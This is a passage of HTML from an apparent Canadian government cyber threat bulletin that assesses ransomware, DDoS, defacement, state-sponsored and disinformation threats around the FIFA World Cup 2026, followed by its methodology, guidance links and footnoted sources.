class="text-info page-header" id="threats-org-businesses-gc">Cyber threats to organizations, businesses, and governments</h2> <p>Cyber threat actors exploit heightened public attention and reputational stakes associated with events like the FIFA World Cup 2026<sup>TM</sup> to further their financial, ideological, or geopolitical objectives. Cyber threat activity related to the FIFA World Cup 2026<sup>TM</sup> will very likely target the broader ecosystem of organizations around the tournament, including:</p> <ul><li><strong>travel and hospitality sectors:</strong> hotels, airlines, ticketing systems, and other booking platforms that handle sensitive data (e.g. credit card information, guest details)<sup id="fn9-rf"><a class="fn-lnk" href="#fn9"><span class="wb-inv">Footnote </span>9</a></sup></li> <li><strong>organizers and participants:</strong> venues, agencies and regulators, and competing teams<sup id="fn10-rf"><a class="fn-lnk" href="#fn10"><span class="wb-inv">Footnote </span>10</a></sup></li> <li><strong>services and sponsors:</strong> high profile brands and service providers associated with the tournament<sup id="fn11-rf"><a class="fn-lnk" href="#fn11"><span class="wb-inv">Footnote </span>11</a></sup></li> <li><strong>infrastructure owners and operators:</strong> various critical infrastructure sectors including municipal transportation, energy and utilities, water and wastewater, and telecommunications<sup id="fn12-rf"><a class="fn-lnk" href="#fn12"><span class="wb-inv">Footnote </span>12</a></sup></li> </ul><p>Cyber threat actors are also likely to exploit the publicity surrounding the FIFA World Cup 2026<sup>TM</sup> to amplify the perceived impact of their disruptive activity, even when the intended targets have no direct link to the competition. For example, on the eve of the 2026 Winter Olympic Games opening ceremony in Italy, more than 120 targets were affected by cyberattacks, including hotel portals in Cortina dāAmpezzo, the region hosting alpine skiing events, and the websites and digital systems of numerous Italian foreign ministries and consulates in major cities worldwide.<sup id="fn13-rf"><a class="fn-lnk" href="#fn13"><span class="wb-inv">Footnote </span>13</a></sup> In a Telegram post, the group responsible said that the operation was retaliation against Italyās āpro-Ukraineā stance.<sup id="fn14-rf"><a class="fn-lnk" href="#fn14"><span class="wb-inv">Footnote </span>14</a></sup> Although none of the compromised systems were directly part of the Olympic infrastructure, the attack occurred at a highly visible time and against entities within the broader Olympic ecosystem. As a result, the media and the public quickly labelled them as attacks against the Olympics, creating the impression that the competition itself was under attack. In most cases, disruptive cyber attacks around major events result only in temporary or localized effects.</p> <h3>Ransomware</h3> <p>We assess that cybercriminals will very likely attempt to extort organizations associated with or supporting the FIFA World Cup 2026<sup>TM</sup> through ransomware attacks. Cybercriminals opportunistically exploit major events to increase their leverage and extract ransom payments from organizations under pressure to keep services running. For example, during the 2024 football season, Italyās Bologna Football Club publicly announced a ransomware attack on its internal security systems, which resulted in the loss of 200GB of data, including strategic documents, sensitive player information, financial records, and confidential data related to stadiums.<sup id="fn15-rf"><a class="fn-lnk" href="#fn15"><span class="wb-inv">Footnote </span>15</a></sup> By encrypting critical systems or stealing data and demanding payment for their release, ransomware attacks can result in data loss, operational disruptions, or delays to event proceedings.</p> <h3>Distributed denial-of-service attacks</h3> <p>Non-state actors will very likely engage in distributed denial-of-service (DDoS) attacks against infrastructure related to the FIFA World Cup 2026<sup>TM</sup>, including official websites, streaming platforms, ticketing systems, and broadcasters, to overwhelm and render services unavailable to legitimate users. For example, during the 2024 EUFA European Championships (The Euros), cyber threat actors conducted a DDoS attack against a Polish public television broadcaster, disrupting broadcasts of key matches involving the Polish national team.<sup id="fn16-rf"><a class="fn-lnk" href="#fn16"><span class="wb-inv">Footnote </span>16</a></sup></p> <h3>Defacement attacks</h3> <p>Non-state cyber threat actors will likely conduct defacement attacks against the official websites or social media accounts of businesses and organizations during the FIFA World Cup 2026<sup>TM</sup>. By hijacking the online presence of event organizers, sponsors and host governments to insert ideological or geopolitical messaging, threat actors seek to reach widespread audiences, drawing attention to their causes. Real-world digital signage including dynamic displays, digital posters, and video walls around FIFA-venues or nearby tourism and transit hubs may also be targeted. For example, during the 2024 Summer Olympic Games, an Iranian cyber group compromised a French digital signage provider in a failed attempt to display photo montages critiquing the participation of Israeli athletes in the sporting competition.<sup id="fn17-rf"><a class="fn-lnk" href="#fn17"><span class="wb-inv">Footnote </span>17</a></sup> In October 2025, three Canadian airports were affected by a similar compromise against a third-party provider resulting in pro-Hamas messaging being broadcast in passenger terminals through flight information displays and public address systems.<sup id="fn18-rf"><a class="fn-lnk" href="#fn18"><span class="wb-inv">Footnote </span>18</a></sup></p> <h3>State-sponsored cyber attacks</h3> <p>We assess that there is a roughly even chance that state-sponsored cyber threat actors will attempt to conduct disruptive cyber threat activity against the FIFA World Cup 2026<sup>TM</sup>. The potential for a state-sponsored disruptive cyber attack increases when a major event coincides with conflict or heightened geopolitical tensions, particularly if a host nation is directly involved in or closely aligned with a party to the conflict. Disruptive cyber operations have previously been deployed by state-sponsored cyber actors to achieve strategic effects.<sup id="fn19-rf"><a class="fn-lnk" href="#fn19"><span class="wb-inv">Footnote </span>19</a></sup> These actions are typically motivated by political or cultural aims, the opportunity to promote an agenda on a global stage, foreign policy considerations, or to retaliate against the host or participating countries.<sup id="fn20-rf"><a class="fn-lnk" href="#fn20"><span class="wb-inv">Footnote </span>20</a></sup></p> <p>Ongoing geopolitical conflicts have increased the likelihood that state-sponsored cyber threat actors will target the tournament and related services with disruptive cyber operations.<sup id="fn21-rf"><a class="fn-lnk" href="#fn21"><span class="wb-inv">Footnote </span>21</a></sup> These actors likely view the FIFA World Cup 2026<sup>TM</sup> and its associated infrastructure as symbolic targets for retaliation and capability signaling.<sup id="fn22-rf"><a class="fn-lnk" href="#fn22"><span class="wb-inv">Footnote </span>22</a></sup> Whether states involved in ongoing conflicts participate in the tournament is a key variable. Our assessment of the likelihood and potential impact of state-sponsored disruptive cyber activity against the competition may change based on the status of hostilities involving event hosts and participating nations.</p> <div class="clearfix">Ā </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix">Ā </div> <h2 class="text-info page-header" id="disinformation-activity">Disinformation and influence activity</h2> <p>Cyber threat actors will very likely use the FIFA World Cup 2026<sup>TM</sup> as a basis for disinformation activity and influence campaigns, exploiting the tournamentās intense public interest and extensive media coverage to amplify ideologically or geopolitically motivated messaging. These campaigns are often fueled by both domestic and international tensions and ongoing social, political, or ideological grievances.</p> <p>We assess that cyber threat actors will almost certainly leverage fake or deceptive AI generated articles, images, and videos (including deepfakes) into their online influence campaigns.<sup id="fn23-rf"><a class="fn-lnk" href="#fn23"><span class="wb-inv">Footnote </span>23</a></sup> For example, ahead of the 2024 Summer Olympics, cyber threat actors released a likely deepfake video denouncing the International Olympic Committee.<sup id="fn24-rf"><a class="fn-lnk" href="#fn24"><span class="wb-inv">Footnote </span>24</a></sup> This video was accompanied by a fabricated, although not necessarily AI-generated, video of US officials warning of public safety threats against local transportation around the event.<sup id="fn25-rf"><a class="fn-lnk" href="#fn25"><span class="wb-inv">Footnote </span>25</a></sup> These campaigns are designed to pollute the online information space, seeking to undermine institutions and sow doubt and division in targeted societies.</p> <div class="clearfix">Ā </div> <h2 class="text-info page-header" id="outlook">Outlook</h2> <p>Major international sporting events like the FIFA World Cup 2026<sup>TM</sup> provide many opportunities for cyber threat actors to exploit the high degree of visibility and public interest around the tournament to further their financial, ideological, or strategic objectives.</p> <p>Many cyber threats can be mitigated through awareness and cyber security best practices. The Cyber Centre encourages all fans, attendees, athletes, government officials, and organizations associated with the FIFA World Cup 2026<sup>TM</sup> to take appropriate measures to protect their systems against the cyber threats detailed in this bulletin.</p> <div class="clearfix">Ā </div> <h2 class="text-info page-header" id="about">About this document</h2> <p>This Cyber Threat Bulletin is intended for the cyber security community. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information visit the <a href="https://www.first.org/tlp/">Traffic Light Protocol</a>.</p> <h3>Contact</h3> <p>For follow-up questions or issues, contact the Canadian Centre for Cyber Security at <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p> <h3>Assessment base and methodology</h3> <p>The key judgements in this bulletin rely on reporting from multiple sources, both classified and unclassified. The judgements are based on the knowledge and expertise in cyber security of the Canadian Centre for Cyber Security (the Cyber Centre). Defending the Government of Canadaās information systems provides the Cyber Centre with a unique perspective to observe trends in the cyber threat environment, which also informs our assessments. The Communications Security Establishment Canadaās (CSE) foreign intelligence mandate provides us with valuable insight into adversary behaviour in cyberspace. While we must always protect classified sources and methods, we provide the reader with as much justification as possible for our judgements.</p> <p>Our judgements are based on an analytical process that includes evaluating the quality of available information, exploring alternative explanations, mitigating biases and using probabilistic language. We use terms such as āwe assessā or āwe judgeā to convey an analytic assessment. We use qualifiers such as āpossiblyā, ālikelyā and āvery likelyā to convey probability.</p> <p>The assessments and analysis are based on information available as of June 3, 2026.</p> <div class="panel panel-default col-md-12"> <div class="panel-body"> <figure><figcaption class="mrgn-bttm-md"><h3>Estimative language guide</h3> </figcaption></figure><p class="mrgn-bttm-lg">The chart below matches estimative language with appropriate percentages. These percentages are not derived via statistical analysis, but are based on logic, available information, prior judgements and methods that increase the accuracy of estimates.</p> <img alt="Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/tarp-language-chart-transparent-e.png" /><details class="brdr-tp brdr-rght brdr-bttm brdr-lft mrgn-bttm-sm"><summary>Long descriptionĀ – Estimative language chart </summary><ul class="list-unstyled mrgn-tp-md"><li>1 to 9% Almost no chance</li> <li>10 to 24% Very unlikely/very improbable</li> <li>25 to 39% Unlikely/improbable</li> <li>40 to 59% Roughly even chance</li> <li>60 to 74% Likely/probably</li> <li>75 to 89% Very likely/very probable</li> <li>90 to 99% Almost certainly</li> </ul></details></div> </div> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix">Ā </div> <section><h2 class="text-info page-header" id="resources">Useful resources</h2> <p>Refer to the following online resources for more information and for advice and guidance.</p> <h3 class="text-info">Guidance for individuals</h3> <ul><li><a href="/en/guidance/device-security-travel-and-telework-abroad-itsap00188">Device security for travel and telework abroadĀ – ITSAP.00.188</a></li> <li><a href="/en/guidance/mobile-device-guidance-high-profile-travellers-itsap-00088">Mobile device guidance for high profile travellersĀ – ITSAP.00.088</a></li> <li><a href="/en/guidance/protecting-yourself-identity-theft-online-itsap00033">Protecting yourself from identity theft onlineĀ – ITSAP.00.033</a></li> </ul><h4>Guidance on phishing attacks</h4> <ul><li><a href="/en/guidance/dont-take-bait-recognize-and-avoid-phishing-attacks">Don’t take the bait: Recognize and avoid phishing attacksĀ – ITSAP.00.101</a></li> <li><a href="https://www.getcybersafe.gc.ca/en/blogs/phishing-scams-youre-more-likely-encounter-when-travelling">Phishing scams youāre more likely to encounter when travelling</a></li> </ul><h4>Guidance on SMS blasters</h4> <ul><li><a href="/en/guidance/protect-your-devices-sms-blasters-itsap00104">Protect your devices from SMS blastersĀ – ITSAP.00.104</a></li> <li><a href="/en/guidance/smishing-protect-yourself-sms-attacks-itsap00103">Smishing: Protect yourself from SMS attacksĀ – ITSAP.00.103</a></li> <li><a href="https://www.getcybersafe.gc.ca/en/blogs/reporting-spam-text-messages-7726">Reporting spam text messages to 7726</a></li> <li><a href="/en/guidance/protect-your-devices-imsi-catchers-itsap00106">Protect your devices from IMSI catchersĀ – ITSAP.00.106</a></li> <li><a href="/en/guidance/cell-site-simulators-itsm00108">Cell site simulatorsĀ – ITSM.00.108</a></li> </ul><h3 class="text-info">Guidance for organizations, businesses, and governments</h3> <ul><li><a href="/en/incident-management">Report a cyber incident</a></li> <li><a href="/en/guidance/security-considerations-critical-infrastructure-itsap10100">Security considerations for critical infrastructureĀ – ITSAP.10.100</a></li> <li><a href="/en/guidance/what-do-when-your-organization-has-been-compromised-cyber-attack-itsap00009">What to do when your organization has been compromised by a cyber attackĀ – ITSAP.00.009</a></li> <li><a href="/en/guidance/cyber-incident-reporting-guidelines-key-information-sharing-requirements-itsm00140">Cyber incident reporting guidelines: Key information sharing requirementsĀ ā ITSM.00.140</a></li> </ul><h4>Guidance on ransomware</h4> <ul><li><a href="/en/guidance/ransomware-playbook-itsm00099">Ransomware playbookĀ – ITSM.00.099</a></li> <li><a href="/en/guidance/ransomware-threat-outlook-2025-2027">Ransomware Threat Outlook 2025-2027</a></li> <li><a href="/en/guidance/ransomware-how-prevent-and-recover-itsap00099">Ransomware: How to prevent and recover (ITSAP.00.099)</a></li> </ul><h4>Guidance on DDoS and defacement attacks</h4> <ul><li><a href="/en/guidance/defending-against-distributed-denial-service-ddos-attacks-itsm80110">Defending against distributed denial of service (DDoS) attacksĀ ā ITSM.80.110</a></li> <li><a href="/en/guidance/distributed-denial-service-attacks-prevention-and-preparation-itsap80110">Distributed denial of service attacksĀ – prevention and preparationĀ – ITSAP.80.110</a></li> <li><a href="/en/guidance/website-defacement-itsap00060">Website defacementĀ – ITSAP.00.060</a></li> </ul><h3 class="text-info">Guidance on disinformation and influence activities</h3> <ul><li><a href="https://www.canada.ca/en/campaign/online-disinformation.html">Online disinformationĀ – Canada.ca</a></li> <li><a href="/en/guidance/how-identify-misinformation-disinformation-and-malinformation-itsap00300">How to identify misinformation, disinformation, and malinformation (ITSAP.00.300)</a></li> </ul><h4>Guidance on artificial intelligence</h4> <ul><li><a href="/en/guidance/artificial-intelligence-itsap00040">Artificial IntelligenceĀ – ITSAP.00.040</a></li> <li><a href="/en/guidance/generative-artificial-intelligence-ai-itsap00041">Generative artificial intelligenceĀ – ITSAP.00.041</a></li> <li><a href="/en/guidance/top-10-artificial-intelligence-security-actions-primer-itsap10049">Top 10 artificial intelligence security actions: A primerĀ – ITSAP.10.049</a></li> <li><a href="/en/guidance/threat-large-language-model-text-generators">The threat from large language model text generators</a></li> </ul></section><div class="clearfix">Ā </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix">Ā </div> <aside class="wb-fnote" role="note"><h2 id="endnotes">End notes</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>FIFA. <a href="https://www.fifa.com/en/tournaments/mens/worldcup/canadamexicousa2026/articles/match-schedule-fixtures-results-teams-stadiums">World Cup 2026Ā | Match schedule, fixtures and stadiums</a>. January 2026.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote </span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p>Royal Canadian Mounted Police. <a href="https://rcmp.ca/en/news/2026/03/4351625">Warning on FIFA World Cup<sup>TM</sup> themed frauds</a>. March 30, 2026.</p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote </span>2<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 3</dt> <dd id="fn3"> <p>Daksh Kapur. <a href="https://www.trellix.com/blogs/research/email-cyberattacks-on-arab-countries-rise/">Email Cyberattacks on Arab Countries Rise in Lead to Global Football Tournament</a>. Trellix. November 17, 2022.</p> <p class="fn-rtn"><a href="#fn3-rf"><span class="wb-inv">Return to footnote </span>3<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 4</dt> <dd id="fn4"> <p>BforeAI PreCrime. <a href="https://bfore.ai/report/suspicious-domain-activity-2026-fifa-world-cup-tournament/">Suspicious Domain Activity in Lead-up to 2026 FIFA World Cup Tournament</a>. August 28, 2025.</p> <p class="fn-rtn"><a href="#fn4-rf"><span class="wb-inv">Return to footnote </span>4<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 5</dt> <dd id="fn5"> <p>OECD.AI Policy Observatory. <a href="https://oecd.ai/en/incidents/2025-08-04-101d">AI-Generated Deepfakes Exploit Ronaldo and Montenegro in Fraudulent Campaigns in PortugaI</a>. August 4, 2025; Thomas Orsolya. <a href="https://malwaretips.com/blogs/cristiano-ronaldo-bitcoin-promo-code-scam/">Beware The Cristiano Ronaldo Bitcoin Promo Code ScamĀ – What You Need To Know</a>. Scam ReportsĀ – MalwareTips. February 10, 2024.</p> <p class="fn-rtn"><a href="#fn5-rf"><span class="wb-inv">Return to footnote </span>5<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 6</dt> <dd id="fn6"> <p>Monica White. <a href="https://www.techradar.com/computing/cyber-security/new-sms-blaster-text-scams-are-on-the-rise-security-experts-warn-stay-safe-by-changing-this-one-phone-setting">New āSMS blasterā text scams are on the rise, security experts warnĀ ā stay safe by changing this one phone setting</a>. Tech Radar. October 4, 2025.</p> <p class="fn-rtn"><a href="#fn6-rf"><span class="wb-inv">Return to footnote </span>6<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 7</dt> <dd id="fn7"> <p>Ron Fanfair. <a href="https://www.tps.ca/media-centre/stories/unprecedented-sms-blaster-arrests/">Unprecedented SMS Blaster Arrests</a>. Toronto Police Service. April 23, 2026; CBC News. <a href="https://www.cbc.ca/news/canada/toronto/sms-blaster-police-cybercrime-investigation-9.7174756">Police arrest 3 people in cybercrime investigation, seize āSMS blastersā used to defraud victims</a>. April 23, 2026.</p> <p class="fn-rtn"><a href="#fn7-rf"><span class="wb-inv">Return to footnote </span>7<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 8</dt> <dd id="fn8"> <p>Hilary Osborne. <a href="https://www.theguardian.com/money/2025/jun/24/police-sms-scams-blaster-texts-smishing">Police warn of SMS scams as āblasterā is used to send thousands of textsĀ | Scams</a>. The Guardian. June 24, 2025; New Zealand Police. <a href="https://www.police.govt.nz/news/release/op-orca-%E2%80%94-smishing-scam-smashed">Op OrcaĀ ā smishing scam smashed</a>. October 3, 2024; Eric Priezkalns. <a href="https://commsrisk.com/criminal-gangs-drive-imsi-catcher-sms-blasters-around-vietnam/">Criminal Gangs Drive IMSI-Catcher SMS Blasters around Vietnam</a>. CommsRisk. April 23, 2023; Bill Toulas. <a href="https://www.bleepingcomputer.com/news/security/bangkok-busts-sms-blaster-sending-1-million-scam-texts-from-a-van/">Bangkok busts SMS Blaster sending 1 million scam texts from a van</a>. Bleeping Computer. November 24, 2024; Bill Giannopoulos. <a href="https://greekcitytimes.com/2026/01/16/sms-blaster-fraud-ring-busted-greece-spata-fake-cell-towers-phishing/">Two Arrested in Greece for SMS Blaster Phishing Attacks on Mobile Banking. Greek City Times</a>. January 16, 2026.</p> <p class="fn-rtn"><a href="#fn8-rf"><span class="wb-inv">Return to footnote </span>8<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 9</dt> <dd id="fn9"> <p>See: Shweta Sharma. <a href="https://www.csoonline.com/article/2081598/cyberattack-forces-omni-hotels-to-shut-down-its-it-systems.html">Cyberattack forces Omni Hotels to shut down its IT systems</a>. CSO Online. April 4, 2024; Justinas Vainilavicius. <a href="https://cybernews.com/cybercrime/hotels-italy-massive-breach/">Hotels in Italy suffer a potentially massive breach</a>. CyberNews. August 14, 2025; Suzanne Kelleher.<a href="https://www.forbes.com/sites/suzannerowankelleher/2025/07/02/3-airlines-cyberattack-qantas-westjet-hawaiian/">The Same Cyberhacking Group Breached 3 Airlines In 3 Weeks</a>. Forbes. July 2, 2025; BBC. <a href="https://www.bbc.com/news/articles/cw99ql0239wo">Ticketmaster confirms data hack</a>. June 2, 2024; Aaron Tinney. <a href="https://www.dailystar.co.uk/sport/football/premier-league-clubs-targeted-cyber-33481776">Premier League clubs targeted by cyber gangs using bots to scalp Ā£50m worth of tickets</a>. Daily Star. August 16, 2024; Monica Burgess. <a href="https://www.huntress.com/threat-library/data-breach/uber-data-breach">Uber Data Breach: What Happened, Impact, and Lessons</a>. Huntress. October 31, 2025.</p> <p class="fn-rtn"><a href="#fn9-rf"><span class="wb-inv">Return to footnote </span>9<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 10</dt> <dd id="fn10"> <p>See: AP News. <a href="https://apnews.com/article/paris-2024-ransomware-museums-olympic-competitions-12a1facc4a245e2e58f229cfc041beac">Paris 2024: French museum network hit by ransomware attack</a>. August 6, 2024; Andy Greenberg. <a href="https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/">Inside Olympic Destroyer, the Most Deceptive Hack in History</a>. WIRED. October 17, 2019; World Anti-Doping Agency (WADA). <a href="https://www.wada-ama.org/en/news/cyber-security-update-wadas-incident-response">Cyber Security Update: WADAās Incident Response</a>. October 5, 2016; Caitalin Cimpanu. <a href="https://www.zdnet.com/article/hackers-hijack-twitter-accounts-for-chicago-bears-and-green-bay-packers/">Hackers hijack social media accounts for the NFL and 15 teams</a>. ZDNET. January 27, 2020; Sergiu Gatlan. <a href="https://www.bleepingcomputer.com/news/security/olympique-marseille-football-club-confirms-cyberattack-after-data-leak/">Olympique Marseille confirms ‘attempted’ cyberattack after data leak</a>. Bleeping Computer. February 26, 2026.</p> <p class="fn-rtn"><a href="#fn10-rf"><span class="wb-inv">Return to footnote </span>10<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 11</dt> <dd id="fn11"> <p>See: Mitchell Langley. <a href="https://dailysecurityreview.com/security-spotlight/coca-cola-data-breach-employee-details-leaked-after-ignored-ransom-demand/">Coca-Cola Data Breach: Employee Details Leaked After Ignored Ransom Demand</a>. Security Daily Review. May 28, 2025; Sead Fadilpasic. <a href="https://www.techradar.com/pro/security/hyundai-it-services-breach-could-put-2-7-million-hyundai-kia-owners-at-risk">Hyundai IT services breach could put 2.7 million Hyundai, Kia owners in the US at risk</a>. Tech Radar. November 7, 2025; Imperva. <a href="https://www.imperva.com/company/press_releases/bot-attacks-on-sporting-gambling-sites-spike-96-during-euro-2020/">Bot Attacks On Sporting and Gambling Sites Spike 96% During EURO 2020Ā – Company</a>. July 12, 2021; Reuters. <a href="https://www.reuters.com/sports/soccer/hackers-hit-poland-euro-2024-match-broadcast-second-attack-2024-06-21/">Hackers hit Poland Euro 2024 match broadcast in second attack</a>. June 21, 2024.</p> <p class="fn-rtn"><a href="#fn11-rf"><span class="wb-inv">Return to footnote </span>11<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 12</dt> <dd id="fn12"> <p>See: Translink. <a href="https://www.translink.ca/about-us/about-translink/cyber-incident">Cyber Incident</a>. December 2020; The Canadian Press. <a href="https://www.cbc.ca/news/canada/toronto/ttc-ransomware-attack-1.6231349">Toronto transit system hit by ransomware attack, TTC says no significant disruption</a>. CBC News. October 29, 2021; Nick Zaccardi. <a href="https://www.nbcsports.com/olympics/news/london-olympics-feared-opening-ceremony-cyber-attack">London Olympics feared opening ceremony cyber attack</a>. NBC Sports. July 9, 2013; Rich Nye. <a href="https://www.wthr.com/article/news/local/russian-hackers-claim-responsibility-for-cybersecurity-attack-on-tipton-indiana-wastewater-treatment-plant/531-7c8d5fc5-aca5-4609-8034-cb2c97c40817">Russian hackers claim cyberattack on Tipton wastewater plant</a>. WTHR Indianapolis. April 24, 2024; Ken Miller. <a href="https://apnews.com/article/texas-muleshoe-water-systems-cyberattacks-russia-5f388bf0d581fc8eb94b1190a7f29c3a">Rural Texas towns report cyberattacks that caused one water system to overflow</a>. AP News. April 18, 2024; Jai Vijayan. <a href="https://www.darkreading.com/cyber-risk/how-the-2022-qatar-world-cup-soccer-was-nearly-hacked">How Soccer’s 2022 World Cup in Qatar Was Nearly Hacked</a>. Dark Reading. April 3, 2024; Canadian Centre for Cyber Security. <a href="/en/guidance/cyber-threat-bulletin-prc-cyber-actors-target-telecommunications-companies-global-cyberespionage-campaign">Cyber threat bulletin: People’s Republic of China cyber threat activity: PRC cyber actors target telecommunications companies as part of a global cyberespionage campaign</a>. June 19, 2025.</p> <p class="fn-rtn"><a href="#fn12-rf"><span class="wb-inv">Return to footnote </span>12<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 13</dt> <dd id="fn13"> <p>Amy Kazim and Giuliana Ricozzi. <a href="https://www.ft.com/content/ad09fe83-abfa-425a-9bb4-5b67ca107c82?syn-25a6b1a6=1">Russia-linked hackers target Winter Olympics in Italy</a>. Financial Times. February 5, 2026; Pierluigu Paganini. <a href="https://securityaffairs.com/187654/hacktivism/pro-russian-group-noname05716-launched-ddos-attacks-on-milano-cortina-2026-winter-olympics.html">Pro-Russian group Noname057(16) launched DDoS attacks on Milano Cortina 2026 Winter Olympics. Security Affairs</a>. February 5, 2026.</p> <p class="fn-rtn"><a href="#fn13-rf"><span class="wb-inv">Return to footnote </span>13<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 14</dt> <dd id="fn14"> <p>Samiksha Jain. <a href="https://thecyberexpress.com/russian-cyberattacks-winter-olympics-2026/">Russian Cyberattacks Put Winter Olympics 2026 On High Alert</a>. The Cyber Express. February 5, 2026.</p> <p class="fn-rtn"><a href="#fn14-rf"><span class="wb-inv">Return to footnote </span>14<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 15</dt> <dd id="fn15"> <p>Phil Muncaster. <a href="https://www.infosecurity-magazine.com/news/bologna-fc-200gb-data-theft/">Bologna FC Hit By 200GB Data Theft and Ransom Demand</a>. InfoSecurity Magazine. December 2, 2024; Alex Lekander. <a href="https://cyberinsider.com/bologna-fc-hit-by-ransomware-attack-confidential-data-stolen/">Bologna FC Hit by Ransomware Attack, Confidential Data Stolen</a>. Cyber Insider. November 29, 2024.</p> <p class="fn-rtn"><a href="#fn15-rf"><span class="wb-inv">Return to footnote </span>15<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 16</dt> <dd id="fn16"> <p>Tara Seals. <a href="https://www.darkreading.com/cyberattacks-data-breaches/ddos-attack-poland-uefa-euro-opening-match">DDoS Attack Targets Poland’s UEFA Euro Opening Match</a>. DarkReading. June 20, 2024.</p> <p class="fn-rtn"><a href="#fn16-rf"><span class="wb-inv">Return to footnote </span>16<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 17</dt> <dd id="fn17"> <p>Silviu Stahie. <a href="https://www.bitdefender.com/en-us/blog/hotforsecurity/fbi-says-iranian-group-tried-to-attack-the-2024-summer-olympics">FBI Says Iranian Group Tried to Attack the 2024 Summer Olympics</a>. Bitdefender. November 1, 2024.</p> <p class="fn-rtn"><a href="#fn17-rf"><span class="wb-inv">Return to footnote </span>17<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 18</dt> <dd id="fn18"> <p>Cheryl Chan. <a href="https://vancouversun.com/news/kelowna-airport-hacked-pro-hamas-messages">Kelowna airport PA system, displays hacked with pro-Hamas messages</a>. Vancouver Sun. October 15, 2025; Amy Judd. <a href="https://globalnews.ca/news/11479402/bc-airports-hacked-pro-hamas-messages-flight-delays/">B.C. airport display screens, PA system hacked with pro-Hamas messages</a>. Global News. October 15, 2025.</p> <p class="fn-rtn"><a href="#fn18-rf"><span class="wb-inv">Return to footnote </span>18<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 19</dt> <dd id="fn19"> <p>Canadian Centre for Cyber Security. <a href="/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a>. Government of Canada. September 20, 2024; Adam Segal. <a href="https://www.cfr.org/articles/new-entries-cfr-cyber-operations-tracker-q2-2024">New Entries in the CFR Cyber Operations Tracker: Q2 2024</a>. Council on Foreign Relations. February 20, 2025.</p> <p class="fn-rtn"><a href="#fn19-rf"><span class="wb-inv">Return to footnote </span>19<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 20</dt> <dd id="fn20"> <p>Canadian Centre for Cyber Security. <a href="/en/guidance/cyber-threat-bulletin-cyber-threat-major-international-sporting-events">Cyber threat bulletin: The cyber threat to major international sporting events</a>. May 31, 2024.</p> <p class="fn-rtn"><a href="#fn20-rf"><span class="wb-inv">Return to footnote </span>20<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 21</dt> <dd id="fn21"> <p>Canadian Centre for Cyber Security. <a href="/en/guidance/cyber-threat-bulletin-iranian-cyber-threat-response-usisrael-strikes-february-2026">Cyber threat bulletin: Iranian Cyber Threat Response to US/Israel strikes</a>. March 02, 2026.</p> <p class="fn-rtn"><a href="#fn21-rf"><span class="wb-inv">Return to footnote </span>21<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 22</dt> <dd id="fn22"> <p>Industrial Cyber. <a href="https://industrialcyber.co/reports/check-point-us-faces-rising-cyber-power-contest-as-state-aligned-operations-target-government-critical-infrastructure/">Check Point: US faces rising cyber power contest as state-aligned operations target government, critical infrastructure</a>. December 10, 2025.</p> <p class="fn-rtn"><a href="#fn22-rf"><span class="wb-inv">Return to footnote </span>22<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 23</dt> <dd id="fn23"> <p>Canadian Centre for Cyber Security. <a href="/en/guidance/national-cyber-threat-assessment-2025-2026">National Cyber Threat Assessment 2025-2026</a>. Government of Canada. October 30, 2024.</p> <p class="fn-rtn"><a href="#fn23-rf"><span class="wb-inv">Return to footnote </span>23<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 24</dt> <dd id="fn24"> <p>The Guardian. <a href="https://www.theguardian.com/technology/article/2024/jun/03/russia-paris-olympics-deepfake-tom-cruise-video">Russia targets Paris Olympics with deepfake Tom Cruise videoĀ | AI</a>. June 3, 2024.</p> <p class="fn-rtn"><a href="#fn24-rf"><span class="wb-inv">Return to footnote </span>24<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 25</dt> <dd id="fn25"> <p>CBS News. <a href="https://www.cbsnews.com/news/russia-targets-americans-traveling-to-paris-olympics-with-fake-cia-video/">Russia targets Americans traveling to Paris Olympics with fake CIA video</a>. June 19, 2024.</p> <p class="fn-rtn"><a href="#fn25-rf"><span class="wb-inv">Return to footnote </span>25<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" 